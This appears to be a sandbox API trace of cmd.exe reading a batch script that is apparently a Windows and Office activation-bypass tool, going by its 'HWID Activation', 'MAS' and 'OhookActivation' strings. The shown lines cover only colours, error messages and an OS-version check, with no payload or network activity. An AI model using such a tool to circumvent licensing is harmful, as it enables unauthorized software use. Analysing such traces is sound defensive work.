lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.248] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"Red=\"Red\" \"white\"\"\r\n", cbMultiByte=29, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"Red=\"Red\" \"white\"\"\r\nE ^| cmd') do set \"esc=%%a\"\r\n") returned 29 [0181.248] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.248] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.248] GetFileType (hFile=0x9c) returned 0x1 [0181.248] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.248] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"Gray=\"Darkgray\" \"white\"\"\r\n", cbMultiByte=34, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"Gray=\"Darkgray\" \"white\"\"\r\ncmd') do set \"esc=%%a\"\r\n") returned 34 [0181.248] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.248] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.248] GetFileType (hFile=0x9c) returned 0x1 [0181.248] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.248] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"Green=\"DarkGreen\" \"white\"\"\r\n", cbMultiByte=35, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"Green=\"DarkGreen\" \"white\"\"\r\nmd') do set \"esc=%%a\"\r\n") returned 35 [0181.248] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.248] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.249] GetFileType (hFile=0x9c) returned 0x1 [0181.249] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.249] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"Blue=\"Blue\" \"white\"\"\r\n", cbMultiByte=30, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"Blue=\"Blue\" \"white\"\"\r\ne\"\"\r\n") returned 30 [0181.249] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.249] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.249] GetFileType (hFile=0x9c) returned 0x1 [0181.249] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.249] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_White=\"Black\" \"Gray\"\"\r\n", cbMultiByte=30, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"_White=\"Black\" \"Gray\"\"\r\n") returned 30 [0181.249] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.249] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.249] GetFileType (hFile=0x9c) returned 0x1 [0181.249] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.249] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_Green=\"Black\" \"Green\"\"\r\n", cbMultiByte=31, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"_Green=\"Black\" \"Green\"\"\r\n\"\"\r\n") returned 31 [0181.249] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.249] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.249] GetFileType (hFile=0x9c) returned 0x1 [0181.249] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.249] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_Yellow=\"Black\" \"Yellow\"\"\r\n", cbMultiByte=32, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"_Yellow=\"Black\" \"Yellow\"\"\r\n\"\r\n") returned 32 [0181.249] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.249] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.249] GetFileType (hFile=0x9c) returned 0x1 [0181.249] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.249] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=")\r\n \"_Yellow=\"Black\" \"Yellow\"\"\r\n") returned 3 [0181.250] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.250] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.250] GetFileType (hFile=0x9c) returned 0x1 [0181.250] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.250] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n\n") returned 2 [0181.250] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.250] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.250] GetFileType (hFile=0x9c) returned 0x1 [0181.250] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.250] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"nceline=echo: &echo ==== ERROR ==== &echo:\"\r\n", cbMultiByte=50, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"nceline=echo: &echo ==== ERROR ==== &echo:\"\r\nc=%%a\"\r\n") returned 50 [0181.250] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.250] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.250] GetFileType (hFile=0x9c) returned 0x1 [0181.250] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.250] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"eline=echo: &call :dk_color %Red% \"==== ERROR ====\" &echo:\"\r\n", cbMultiByte=66, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"eline=echo: &call :dk_color %Red% \"==== ERROR ====\" &echo:\"\r\n | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n") returned 66 [0181.250] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.250] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.250] GetFileType (hFile=0x9c) returned 0x1 [0181.250] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.250] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %~z0 GEQ 200000 (\r\n", cbMultiByte=22, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %~z0 GEQ 200000 (\r\n :dk_color %Red% \"==== ERROR ====\" &echo:\"\r\n") returned 22 [0181.250] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.250] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.250] GetFileType (hFile=0x9c) returned 0x1 [0181.250] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.251] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_exitmsg=Go back\"\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"_exitmsg=Go back\"\r\ndk_color %Red% \"==== ERROR ====\" &echo:\"\r\n") returned 24 [0181.251] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.251] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.251] GetFileType (hFile=0x9c) returned 0x1 [0181.251] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.251] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_fixmsg=Go back to Main Menu, select Troubleshoot and run Fix Licensing option.\"\r\n", cbMultiByte=87, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"_fixmsg=Go back to Main Menu, select Troubleshoot and run Fix Licensing option.\"\r\n1% && (set _NCS=0)\r\n") returned 87 [0181.251] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.251] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.251] GetFileType (hFile=0x9c) returned 0x1 [0181.251] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.251] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=") else (\r\n", cbMultiByte=10, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=") else (\r\nsg=Go back to Main Menu, select Troubleshoot and run Fix Licensing option.\"\r\n") returned 10 [0181.251] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.251] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.251] GetFileType (hFile=0x9c) returned 0x1 [0181.251] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.251] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_exitmsg=Exit\"\r\n", cbMultiByte=21, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"_exitmsg=Exit\"\r\nto Main Menu, select Troubleshoot and run Fix Licensing option.\"\r\n") returned 21 [0181.251] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.251] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.251] GetFileType (hFile=0x9c) returned 0x1 [0181.251] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.251] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_fixmsg=In MAS folder, run Troubleshoot script and select Fix Licensing option.\"\r\n", cbMultiByte=87, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"_fixmsg=In MAS folder, run Troubleshoot script and select Fix Licensing option.\"\r\n") returned 87 [0181.251] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.251] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.251] GetFileType (hFile=0x9c) returned 0x1 [0181.252] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.252] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=")\r\n \"_fixmsg=In MAS folder, run Troubleshoot script and select Fix Licensing option.\"\r\n") returned 3 [0181.252] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.252] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.252] GetFileType (hFile=0x9c) returned 0x1 [0181.252] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.252] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n\n") returned 2 [0181.252] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.252] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.252] GetFileType (hFile=0x9c) returned 0x1 [0181.252] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.252] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0181.252] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.252] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.252] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.252] GetFileType (hFile=0x9c) returned 0x1 [0181.252] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.252] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0181.252] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.252] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.252] GetFileType (hFile=0x9c) returned 0x1 [0181.252] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.252] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %winbuild% LSS 10240 (\r\n", cbMultiByte=27, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %winbuild% LSS 10240 (\r\n===============================================================================================================\r\n") returned 27 [0181.253] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.253] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.253] GetFileType (hFile=0x9c) returned 0x1 [0181.253] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.253] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="%eline%\r\n", cbMultiByte=9, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="%eline%\r\nild% LSS 10240 (\r\n") returned 9 [0181.253] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.253] GetFileType (hFile=0x9c) returned 0x1 [0181.253] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.253] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo Unsupported OS version detected [%winbuild%].\r\n", cbMultiByte=52, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo Unsupported OS version detected [%winbuild%].\r\n======================================================================================\r\n") returned 52 [0181.253] GetFileType (hFile=0x9c) returned 0x1 [0181.253] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.254] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo HWID Activation is supported only for Windows 10/11.\r\n", cbMultiByte=59, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo HWID Activation is supported only for Windows 10/11.\r\n===============================================================================\r\n") returned 59 [0181.254] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.254] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.254] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.254] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.254] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.254] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.254] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.254] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.254] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.254] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.255] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.255] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.255] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.255] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.255] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.255] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.255] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.255] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.255] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.255] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.255] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.255] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.255] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.255] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.256] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.256] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.256] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.256] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.256] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.256] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.256] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.256] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.256] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.256] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.256] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.256] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.257] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.257] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.257] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.257] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.257] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.257] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.257] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.257] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.257] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.257] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.258] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.258] _wcsicmp (_String1="_color2", _String2="dl_final") returned -5 [0181.258] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.258] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.258] _wcsicmp (_String1="_color2", _String2="dk_checksku") returned -5 [0181.258] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.258] _wcsicmp (_String1="_color2", _String2="dk_checkperm") returned -5 [0181.258] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.258] _wcsicmp (_String1="_color2", _String2="dk_refresh") returned -5 [0181.258] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.258] _wcsicmp (_String1="_color2", _String2="dk_act") returned -5 [0181.258] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.258] _wcsicmp (_String1="_color2", _String2="dk_actids") returned -5 [0181.258] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.259] _wcsicmp (_String1="_color2", _String2="getactivationid") returned -8 [0181.259] _wcsicmp (_String1="_color2", _String2="getactivationid") returned -8 [0181.259] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.259] _wcsicmp (_String1="_color2", _String2="dk_ckeckwmic") returned -5 [0181.259] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.259] _wcsicmp (_String1="_color2", _String2="dk_product") returned -5 [0181.259] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.259] _wcsicmp (_String1="_color2", _String2="dk_reflection") returned -5 [0181.259] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.259] _wcsicmp (_String1="_color2", _String2="dk_errorcheck") returned -5 [0181.259] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.259] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.259] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.259] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.260] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.260] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.260] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.260] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.260] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.260] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.261] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.261] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.261] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.261] _wcsicmp (_String1="_color2", _String2="wpatest") returned -24 [0181.261] _wcsicmp (_String1="_color2", _String2="wpatest") returned -24 [0181.261] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.261] _wcsicmp (_String1="_color2", _String2="dk_color") returned -5 [0181.261] _wcsicmp (_String1="_color2", _String2="dk_color2") returned -5 [0181.262] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.262] _wcsicmp (_String1="_color2", _String2="dk_done") returned -5 [0181.262] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.262] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.262] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.262] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.262] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.262] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.262] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.262] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.262] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.262] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.262] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.262] _wcsicmp (_String1="_color2", _String2="hwiddata") returned -9 [0181.263] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.263] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.263] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.263] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.263] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.263] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.263] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.263] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.263] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.263] _wcsicmp (_String1="_color2", _String2="hwidfallback") returned -9 [0181.263] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.263] _wcsicmp (_String1="_color2", _String2="OhookActivation") returned -16 [0181.263] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.263] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.263] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.264] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.264] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.264] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.264] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.264] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.264] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.264] _wcsicmp (_String1="_color2", _String2="oh_menu") returned -16 [0181.264] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.264] _wcsicmp (_String1="_color2", _String2="oh_menu2") returned -16 [0181.264] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.264] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.265] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.265] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.265] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.265] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.265] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.265] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.265] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.265] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.266] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.266] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.266] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.266] _wcsicmp (_String1="_color2", _String2="starto16c2r") returned -20 [0181.266] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.266] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.266] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.266] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.266] _wcsicmp 